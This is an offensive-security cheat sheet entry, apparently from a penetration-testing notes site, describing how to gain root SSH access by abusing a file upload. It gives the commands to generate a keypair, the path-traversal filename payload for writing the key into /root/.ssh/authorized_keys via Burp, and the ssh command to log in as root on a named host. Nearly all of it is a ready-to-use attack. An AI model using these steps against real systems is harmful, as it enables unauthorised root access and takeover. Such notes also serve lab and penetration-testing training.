>_ shadow.red

File Upload Abuse - SSH authorized_keys

Initial Access Web Attacks linux

1. Generate keypair on attacker

ssh-keygen
cat NAZWAPLIKUKEYGEN.pub > authorized_keys

2. Upload via path traversal in Burp

../../../../../../../root/.ssh/authorized_keys

3. Connect

rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup root@mountaindesserts.com